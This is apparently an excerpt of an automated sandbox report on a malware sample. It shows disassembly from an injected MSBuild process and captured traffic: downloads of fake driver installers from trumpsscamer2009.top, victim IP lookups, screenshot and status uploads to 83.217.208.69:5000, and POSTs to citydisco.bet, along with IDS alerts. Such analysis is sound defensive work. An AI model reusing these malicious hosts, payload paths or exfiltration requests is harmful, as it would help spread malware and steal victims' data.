Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]13_2_00445ED1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]13_2_004236EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [ebx], cl13_2_004386EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], cx13_2_00432F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esi+edx]13_2_00432F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], cx13_2_00432F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax]13_2_0041AF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-4926828Ah]13_2_0041AF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1A92C912h]13_2_0040C710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-2Ah]13_2_0044C7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+04h]13_2_00412FDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]13_2_00446790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [eax], cl13_2_0041EFAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+18h]13_2_0040EFAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]13_2_00433FB0

Networking

barindex
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49727
Source: global trafficTCP traffic: 192.168.2.5:49714 -> 83.217.208.69:5000
Source: global trafficHTTP traffic detected: GET /bld/Printer_driver_Setup_Install_v32.12.71.exe HTTP/1.1Host: trumpsscamer2009.top
Source: global trafficHTTP traffic detected: GET /bld/Microsoft_Driver_vs_2019.exe HTTP/1.1Host: trumpsscamer2009.top
Source: global trafficHTTP traffic detected: GET /bld/Printer_driver_Setup_Install_v32.12.71.exe HTTP/1.1Host: trumpsscamer2009.top
Source: global trafficHTTP traffic detected: GET /bld/Printer_driver_Setup_Install_v32.12.71.exe HTTP/1.1Host: trumpsscamer2009.top
Source: global trafficHTTP traffic detected: GET /bld/Printer_driver_Setup_Install_v32.12.71.exe HTTP/1.1Host: trumpsscamer2009.top
Source: global trafficHTTP traffic detected: GET /bld/Printer_driver_Setup_Install_v32.12.71.exe HTTP/1.1Host: trumpsscamer2009.top
Source: global trafficHTTP traffic detected: GET /bld/Printer_driver_Setup_Install_v32.12.71.exe HTTP/1.1Host: trumpsscamer2009.top
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global trafficHTTP traffic detected: POST /send_photo HTTP/1.1Host: 83.217.208.69:5000Content-Type: multipart/form-data; boundary="c2ca08da-a5fe-4ea8-ba18-84cde3bad365"Content-Length: 695598Data Raw: 2d 2d 63 32 63 61 30 38 64 61 2d 61 35 66 65 2d 34 65 61 38 2d 62 61 31 38 2d 38 34 63 64 65 33 62 61 64 33 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 32 30 32 35 2d 30 33 2d 31 34 2d 31 34 2d 34 33 2d 33 35 2d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 32 30 32 35 2d 30 33 2d 31 34 2d 31 34 2d 34 33 2d 33 35 2d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 ff a5 49 44 41 54 78 5e ec fd 77 94 65 47 99 a7 0b 9f 93 e5 4b 3d 6b cc 9d fe be bb ee 9d 6e 66 ee 1f d3 3d 73 d7 37 6d 66 ee 1f 57 d3 4d 4f 37 92 90 f7 de 22 09 0a 10 de 0a 21 bc 70 42 ae 04 02 19 64 91 84 11 a6 1b 9a 16 12 f2 42 de 3b 04 a8 e4 bd 41 1e 24 40 82 fd c5 13 7b ff 76 fe 4e e4 7b 5c e6 c9 aa 12 64 ae f5 ac 88 78 e3 8d d8 fb 9c 2c 41 d5 b3 de d8 bb d3 39 e5 f9 6a b2 3c db 87 67 fa 90 e6 4e 4e ad 68 f3 d3 5e 27 3f 37 94 ee 49 f3 43 e7 c4 74 0f 0b cc 9a ee 97 47 a7 73 42 fa bd c3 f1 4f f7 a2 f8 3a 64 aa a0 9b ee 6b 92 cc c7 9e ce d4 71 d3 74 8f 7d aa ea 7c e9 c9 0c 7d c5 26 81 f6 1d 97 ee 17 e7 46 e7 98 9f cf 89 a9 2f c4 74 3f ff c4 da e1 e8 c7 d7 2a 9d d5 8f 8d c4 d4 51 e2 89 81 74 8f 4c fb 0e 60 ea 88 d9 d3 3d fc b1 a1 4c 1d 56 d3 fd dc a3 6d df 63 93 a6 73 e8 23 23 31 f5 d9 d9 d3 fd cc c3 2d 53 73 a4 fb e9 87 e6 c4 d4 27 1f 9c 5f 3e f1 c0 44 e9 7e fc fe b1 98 2a e8 7e ec be 39 d3 f9 e8 bd 2d 8b 3e 7a 5f 35 f5 91 7b 67 d0 fd f0 3d 03 99 fa 90 48 eb 47 a0 7b 70 da 73 16 2c fa e0 dd 2d 53 07 dd 35 3e 1f b8 73 56 74 0f 5c d3 f0 b3 91 98 7a ff ec e8 be ef a7 03 59 54 30 f5 de 9f d4 bc 27 ad 4f 2c 0a 98 7a 77 ca 9b 03 dd 77 fd a4 65 d1 3b 07 b3 f8 5d e9 be 52 3b f5 8e db 07 b2 e8 ed 31 53 6f fb 71 66 d1 5b 6b a6 de 72 5b 0f c4 16 bf ed f6 4c 99 a3 b1 62 e5 18 ba 07 dc da f6 35 16 3e 5e 64 4c bd f9 96 69 de 78 73 cb a2 37 dd 32 03 9f 77 ba ab 6e aa 3a 6f b8 b1 5a f2 c6 5b aa c5 ab 6e 9e c1 a2 37 dc 94 99 7a fd 8d b9 25 e6 7d e5 b0 0f 28 7f 71 c1 92 94 27 18 b3 47 77 ff 1b aa ce eb 13 fb 5f 5f 2d e5 fa 29 be 28 c5 b5 66 2a cd 2f da af 66 f1 fe 29 9e 58 f2 fa b4 57 03 63 cd 43 f7 75 d7 65 34 9e da f7 fa 36 b6 fc f5 37 57 4b f7 4b 7b ec 7b 6d b5 e8 75 d7 64 e8 8b a5 e9 1e 7c 6e c9 7e d7 e5 d8 d2 7d af ab 96 bc 2e e5 ec 93 f2 07 b1 77 ba ee 5e d7 56 53 7b 5e 53 75 f7 b8 ba ea ec 7e 55 ee 13 5f fa ba 74 6f 29 a6 b1 20 9f 76 c9 3e d7 57 cb 53 ce b2 d4 2e 21 96 f2 68 97 92 97 fa 9d 5d af c8 73 8c 17 a5 7d ba bb 5d 99 5b 8f 4d a5 eb d1 96 10 87 c5 bb 5f 5d 2d d9 23 ed db c0 78 d1 6e 69 6e
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global trafficHTTP traffic detected: POST /send HTTP/1.1Host: 83.217.208.69:5000Content-Type: application/json; charset=utf-8Content-Length: 175Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 5c 75 32 37 31 34 5c 75 46 45 30 46 20 46 69 6c 65 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 6c 61 75 6e 63 68 65 64 20 5c 6e 5c 6e 20 5c 75 44 38 33 43 5c 75 44 46 46 34 20 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 5c 6e 20 5c 75 32 37 31 36 5c 75 46 45 30 46 20 42 75 69 6c 64 3a 20 4d 69 63 72 6f 73 6f 66 74 20 42 75 69 6c 64 20 5c 6e 20 5c 75 32 37 31 36 5c 75 46 45 30 46 20 48 6f 73 74 3a 20 32 31 36 30 34 31 20 5c 6e 20 22 7d Data Ascii: {"message":"\u2714\uFE0F File successfully launched \n\n \uD83C\uDFF4 IP: 8.46.123.189 (United States)\n \u2716\uFE0F Build: Microsoft Build \n \u2716\uFE0F Host: 216041 \n "}
Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: ip-api.com
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49713 -> 104.26.13.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 104.26.13.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49711 -> 208.95.112.1:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49717 -> 104.26.13.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49718 -> 104.26.13.205:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49719 -> 208.95.112.1:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49723 -> 104.26.13.205:80
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49725 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49729 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49732 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49730 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49734 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49733 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49735 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49709 -> 172.67.159.94:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49724 -> 172.67.159.94:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49721 -> 172.67.159.94:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49731 -> 172.67.159.94:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49739 -> 172.67.159.94:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49740 -> 172.67.159.94:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49720 -> 172.67.159.94:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49736 -> 172.67.159.94:443
Source: global trafficHTTP traffic detected: GET /scr/plugin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: trumpsscamer2009.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 57Host: citydisco.bet
Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=aTIKewjTUSbhWMs2WyRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14934Host: citydisco.bet
Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=40NoBK54gzXwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15048Host: citydisco.bet
Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=xSOq4JU0Kuvtaek9lgoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20572Host: citydisco.bet
Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CB2bEG2e79t5cvL1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2604Host: citydisco.bet
Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GqUit8221xyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572767Host: citydisco.bet
Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 95Host: citydisco.bet
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: unknownTCP traffic detected without corresponding DNS query: 83.217.208.69
Source: global trafficHTTP traffic detected: GET /scr/plugin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: trumpsscamer2009.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bld/Printer_driver_Setup_Install_v32.12.71.exe HTTP/1.1Host: trumpsscamer2009.top
Source: global trafficHTTP traffic detected: GET /bld/Microsoft_Driver_vs_2019.exe HTTP/1.1Host: trumpsscamer2009.top
Source: global trafficHTTP traffic detected: GET /bld/Printer_driver_Setup_Install_v32.12.71.exe HTTP/1.1Host: trumpsscamer2009.top
Source: global trafficHTTP traffic detected: GET /bld/Printer_driver_Setup_Install_v32.12.71.exe HTTP/1.1Host: trumpsscamer2009.top
Source: global trafficHTTP traffic detected: GET /bld/Printer_driver_Setup_Install_v32.12.71.exe HTTP/1.1Host: trumpsscamer2009.top
Source: global trafficHTTP traffic detected: GET /bld/Printer_driver_Setup_Install_v32.12.71.exe HTTP/1.1Host: trumpsscamer2009.top
Source: global trafficHTTP traffic detected: GET /bld/Printer_driver_Setup_Install_v32.12.71.exe HTTP/1.1Host: trumpsscamer2009.top
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global trafficDNS traffic detected: DNS query: trumpsscamer2009.top
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: ip-api.com
Source: global trafficDNS traffic detected: DNS query: citydisco.bet
Source: unknownHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 57Host: citydisco.bet
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 18:43:42 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400cf-cache-status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=34tESCDWBrViZzzrHeN0bSUCAWzrmIhCh8xsnWaH%2FM330QeYue05md9inbsSeMwhjVTiTDzrSG2%2BEs%2BDJpnSvrK7%2BiYKgg3N%2BeNHJFDsX1%2F0f1eiO8q%2BZUXHQI8%2ByveF6pVFqRcbgg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9205eb0fbb4a7039-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2080&min_rtt=2076&rtt_var=787&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=730&delivery_rate=1382575&cwnd=132&unsent_bytes=0&cid=5ad2b119849edda8&ts=443&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 18:43:45 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400cf-cache-status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nkIc25F3IAL6NqQ6Fro2FLTESs9W80qQ7AAh%2BiDbM5s6g53aTCSuoQzYjCHTFVBmqy5fXxXCSDui3yX%2FZwUneUxtbh7sufSTjD%2F8a18yg8oNwcZOGP6YITg015tIwqiyIwCIfBj0%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9205eb211823ed71-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2020&min_rtt=1998&rtt_var=765&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=730&delivery_rate=1461461&cwnd=123&unsent_bytes=0&cid=591e55e01242c7ff&ts=312&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 18:43:50 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400cf-cache-status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7BF9AtlHLVfFLwItaEAeSpHDcFfDyS7qrvA8EwhuHC7ZRySJxtj0L%2BEQQprXW4DfPOPTYweoUMOMNdvjZATvP2lpR6lNVX5VFYWdX7KsDib9cn4iOsAprKlUdeJKrYt%2Bxhu3twPE6Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9205eb3f2e7e5e80-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1568&rtt_var=600&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=730&delivery_rate=1805813&cwnd=214&unsent_bytes=0&cid=f49fdede2593f134&ts=332&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 18:43:59 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeAge: 16Cache-Control: max-age=14400cf-cache-status: HITReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vKdcBAGmHfXSSJAV60gNIcAp2snSTinGr%2BsK5aSIxw3BbD2P9sBvDdJU6M8qD5nbxrO375yJyWjeDaa17WoLHTg7ckLRRDZb0k5yOay9FRXIKMU8W54PZIVygSkUyzfq80%2By5v3gaw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9205eb760f45d2b1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2029&min_rtt=1997&rtt_var=813&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=730&delivery_rate=1295474&cwnd=83&unsent_bytes=0&cid=c76b7230f9d2313b&ts=139&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 18:44:15 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeAge: 25Cache-Control: max-age=14400cf-cache-status: HITReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u2QzadpzatG93l44MMMav7FlNRiWN3OwwwdA3Dt%2BuToFTnEAOhi4DPK9ssOgMsEYOy%2FB09YSmxDntx4xi454b%2BeAVKgJXK4En4FZ9IC3zjD%2FBRJ%2B8%2FJNhhpMsr0nbWGsnP5I7XGvfw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9205ebdddfbef799-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1591&rtt_var=609&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=730&delivery_rate=1780487&cwnd=208&unsent_bytes=0&cid=523e0a0a934197cc&ts=138&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 18:44:48 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeAge: 57Cache-Control: max-age=14400cf-cache-status: HITReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DtQDVZy4Gluo6o%2FnkxXAUR9Q2w6xtg13VKVGQmckwgbKBUVHetRc686XARn%2F8ypGdmSMtltzPuqH%2FyR%2BZJosGTkpCMINljLirIg9y9Ed4az2Hs%2BDJkBqsV7ENu%2F4etCdCPN6DaVsPw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9205eca9bea34388-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1558&rtt_var=600&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=730&delivery_rate=1800246&cwnd=219&unsent_bytes=0&cid=2b935c4c91e2528c&ts=170&x=0"
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
